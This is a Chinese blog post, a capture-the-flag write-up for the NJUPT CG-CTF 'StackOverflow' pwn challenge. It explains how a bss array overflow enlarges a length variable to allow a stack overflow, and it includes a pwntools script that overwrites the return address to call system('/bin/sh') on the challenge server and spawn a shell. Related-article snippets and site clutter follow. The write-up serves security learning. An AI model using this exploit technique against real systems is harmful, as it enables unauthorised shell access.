NJUPT-CGCTF pwn2 StackOverflow [Writeup]

最新推荐文章于 2022-04-02 19:06:53 发布
最新推荐文章于 2022-04-02 19:06:53 发布
阅读量2k 收藏 2
点赞数
分类专栏: PWN_of_CTF 文章标签: stack overflow CTF pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cossack9989/article/details/78938940
版权

最近肥肠地想入门一下pwn,找了道题试了一下。

题目网址:StackOverflow

栈溢出啊。。虽然我水平很菜。。还是觉得挺有意思的

不扯了,先看题。

扔到32位IDA里面看看,观察一下,发现有两个很关键的函数message与pwnme,很显然message可以用来栈溢出,pwnme可以用来调用system函数,但是Alt+T之后并没有发现‘/bin/sh’,也没有提供libc.so,这可咋整啊

问题先搁置一下,首先得来个栈溢出。

可是,用的是相对于gets更加安全的fgets,而且缓冲区只有10byte。。。

于是去内存中找变量n

bss段(未初始化全局变量)。。妙啊。。看来是数组A越界改n的值啊,把n改成自己想要的大小

然后理论上说fgets遇‘\n’或缓冲区满则结束,是无法溢出的,但是既然我能控制缓冲区大小,不就相当于可以StackOverflow了吗?

这样我就可以去构造payload去覆盖ebp,篡改返回地址,指向pwnme函数。

到此,第一步结束了,接下来又回到了开头的问题——没有‘/bin/sh’。

可是我有bss段啊,在第一次输入时再补上一个‘/bin/sh’不就行了?

放脚本

from pwn import *
r=remote('182.254.217.142',10001)

#create '/bin/sh' in bss
r.recvuntil('your choice:\n')
r.sendline('1')

payload1='A'*40+p32(0x80)+'/bin/sh'     #exploit the bss
r.recvuntil('you can leave some message here:\n')
r.sendline(payload1)

elf=ELF('./cgpwna')
sysadr=elf.symbols['system']            #find the adr of system

payload2='A'*(0x30+0x4)+p32(sysadr)+p32(0xDEADBEEF)+p32(0x0804A0AD)
					#use system('/bin/sh') and rand return address
r.recvuntil('your name please:\n')
r.sendline(payload2)

r.interactive()


(小插曲:一开始/bin/sh的地址搞错了,打了半天没打下来(滑稽))

最后,祝各位元旦快乐啊,2018年一起进步!

C0ss4ck
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
BugkuCTF pwn题第一弹
weixin_43489686的博客
09-09 2087
BugkuCTF pwn题第一弹
whctf2017_stackoverflow(glibc任意地址写一个0字节漏洞利用)
seaaseesa的博客
06-12 765
whctf2017_stackoverflow(glibc任意地址写一个0字节漏洞利用) 首先,检查一下程序的保护机制 然后,我们用IDA分析一下 输入name的功能可以用于地址泄露 在主功能里,存在一个glibc任意地址写入一个0字节的漏洞,我们可以通过malloc一个很大的堆,这样系统调用mmap分配内存,其地址靠近glibc地址,并且偏移固定,这样,我们就能玩glibc里任意地址写一个\x00字节,我们可以劫持_IO_2_1_stdin里的IO_buf_base成员低1字节为\x00,
BugkuCTF刷题 pwn
像初雪一样自由洒落
04-02 486
唉,觉得自己TCL,栈溢出知识点差不多都会了,可是题目做不出来啊啊啊啊!缺少锻炼吧,这两天把BugkuCTF上面的pwn题做一下吧。。。 pwn1 只给了连接 第一次,才50分,想来不会太难,连上去 果然,连接就能拿flag ...
CG-CTF simple machine
YenKoc的博客
04-11 348
这题讲道理还是蛮坑的,有些点如果不会的话,会卡死你,然后就是代码有点长,需要有很好的耐心。 找到主函数: 这里的mmap函数,是一个分配内存的函数,主要是存放文件的,下午也是百度了下才知道,这东西对于文件的存取和共享修改的效率有很高的提高,这里就简要的认为是个分配内存空间的函数,同时360的加固反调试mmap函数会去检测traceid的值,进行反调试,虽然这种绕过也挺简单的。2333 二.加...
BugkuCTF-PWN题canary超详细讲解
am_03的博客
08-31 2107
知识点 小端序说明,数据在内存里是如何存储的?下表里数据都为16进制 解题流程 题目Hint:更新 LibcSeacher 的 libc-database checksec查看保护机制 0x28=40 0x10=16 0x29=41 0x300=768 0x2C=44 buf长度为48,而read读取长度为768 v5长度为520,而read读取长度为768 所以存在栈溢出漏洞 from pwn import * #sh = process('./pwn4_') #context.log_lev
毕业论文matlab代码-paper-matlab-njupt-master:纸-matlab-njupt-master
05-28
paper-matlab-njupt 研究生毕业论文的matlab代码 整个代码结构分三个部分:ensemble-obj、ensemble-out、local。 其中ensemble-obj是基于集成目标干扰的特征选择算法。是FWELL、FWELL-OBJ(基于目标干扰的特征选择...
南京邮电大学本科生毕业设计Latex模板-NJUPT-Bachelor.zip
11-07
南京邮电大学本科生毕业设计Latex模板-NJUPT-Bachelor
积分管理系统java源码-NJUPT-AP-Free-Exams:南京邮电大学应用物理系专业课资料
06-06
NJUPT-CS-Free-Exams 南京邮电大学应用物理学历年考试资料。 受 和 等项目启发,我们决定将南京邮电大学应用物理学专业的历年资料整理出来,以利后人。上述两项目对本资料集有重要影响,在这里向他们表示感谢。 * ​...
NJUPT-CS-Free-Exams:Cheat sheets for CS@NJUPT. 南京邮电大学计算机科学与技术专业历年考试资料
05-04
NJUPT-CS-Free-Exams南京邮电大学计算机科学与技术专业历年考试资料。受 和 等项目启发,我们决定将南京邮电大学CS专业课程的历年资料整理出来,以利后人。上述两项目对本资料集有重要影响,在这里向他们表示感谢。...
njupt-C语言
01-14
南京邮电大学C语言实验报告源代码
电路分析课件-南京邮电大学(NJUPT
10-16
本课程是研究电路理论的入门课程,着重讨论集中参数的线性、时不变电路,是电子、通信等电子信息类专业的一门技术基础课。通过本课程学习使学生掌握电路分析的基本概念、基本理论和基本分析方法,并具备必要的分析问题的能力,为学习“信号与系统”、“电子电路”等后续课程打下必不可少的基础。
CG-CTF刷题记录(一)
qq_40712959的博客
10-12 1243
md5 collision md5 collision 地址 $md51 = md5('QNKCDZO'); $a = @$_GET['a']; $md52 = @md5($a); if(isset($a)){ if ($a != 'QNKCDZO' && $md51 == $md52) { echo "nctf{*****************}"; } else { ...
南京邮电大学CTF-PWN-Stack Overflow
WocW的博客
12-21 1368
经过双月赛,通过阅读同级人的WriteUp结合参赛的亲身体验。深深感觉到自己文字表达能力的欠缺,以及技术上的差距。但能意识到差距是好事,意识到了就努力去弥补。一直想要学习PWN,一拖再拖,终于开始了。 关于write up,老师说了一句话,印象深刻。“write up 是写给别人看的,不是你自己看懂了就行。” 进入正题: 把文件拖入IDA,进入main函数F5反编译,先看程序流程。 set...
171222 pwn-CGCTFpwn150)
whklhhhh的博客
12-22 1648
1625-5 王子昂 总结《2017年12月22日》 【连续第448天总结】 A. CGCTF-cgpwna B. 简单的栈溢出,作为复习用的第一题233结果还是折腾了好久 基本概念不清啦很明显,message函数中存在栈溢出 A和n是全局变量,s是栈上的局部变量虽然s的长度受限,但是因为是全局变量所以可以通过A的溢出来修改n 它们在bss段,发现n紧接着A后面,A的长度是28字节,
CG-CTF Stack Overflow
weixin_43464124的博客
05-11 785
为了上800分也是够了… 题目地址:pwn 看了几篇wp,觉得写得总是差那么一丢丢意思 首先检查溢出点 通过双击A可以看到,A这个数组的大小为40 但其可以接受64个字符的大小 所以这是第一个溢出点 然后往下看 虽然明面上显示的是输入s是有限制的 限制为n 但是当我们双击n的时候会发现 n就在A的下面 因此我们可以通过A来溢出到n 在函数列表中我们可以看到有一个函数 名字叫做pwnme 这部明...
CG-CTF Stack Overflowpwn
苗_的博客
02-24 653
首先先拿到ida里面看一下,找一下溢出点 点进去A发现是一个大小为40的数组(0x28),但是可以接受64个字符,所以这里是第一个溢出点。 下面是对s进行输入,限制是n,点开n会发现n就在A的下面。 所以思路就是:我们可以通过溢出A来达到覆盖n的效果 然后我们点开pwnme函数会发现system函数,搜索字符串发现没有‘/bin/sh’,所以需要我们自己写入bss段。 exp: f...
bugkuctf练习平台reverse部分writeup
saltyfish_yuch的博客
09-06 8162
题目地址:http://123.206.31.85/challenges 题目:Easy_vb flag格式:flag{xxxx} 题目来自MCTF,原题目格式:MCTF{xxxx} 打开下载的文件是这样的界面 于是用IDA打开 找到flag 题目:Easy_Re flag格式:DUTCTF{xxx
CG-CTF web刷题记录
qq_45130960的博客
11-17 1273
这里刚入门ctf小白一枚 如果有什么地方说错了或者有待改进的地方欢迎指出喔(-w-) 1.签到题 KEY在哪里? 在网页源码里~fn+F12查看网页源码收获flag一枚 2.签到2 打开题目我们看到题目让给我们输入口令:zhimakaimen 可是输入了之后依然报错呢F12看一下网页源代码 在maxlength处限制了我们输入字符的长度 我们将它改成11 重新输入 “zhimakaimen” ...
逆向----BugkuCTF----Mountain climbing----笔记
thread
09-27 2889
开局一张图,首先这个dword的数组由伪随机数生成。 随机数种子一定,那么rand出来的数是一定的。 if ( j_strlen(Str) == 19 )可以得出 输入字符串是19的长度。 并且 while ( v4 < 19 )和 ++v4; 这两行 可以看出来 整个while目的在遍历输入的字符串, 输入的字符串索引的单个字符如果ascii码==76 或 == 82 会索...
njupt信号与系统分析(第2版)解培中课后习题答案
最新发布
12-20
NJUPT信号与系统分析(第2版)解培中课后习题答案》是针对南京邮电大学信号与系统分析课程的辅助教材,为学生提供了课后习题的答案,帮助他们更好地理解课程内容和提高学习成绩。 本书包括了信号与系统分析课程的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值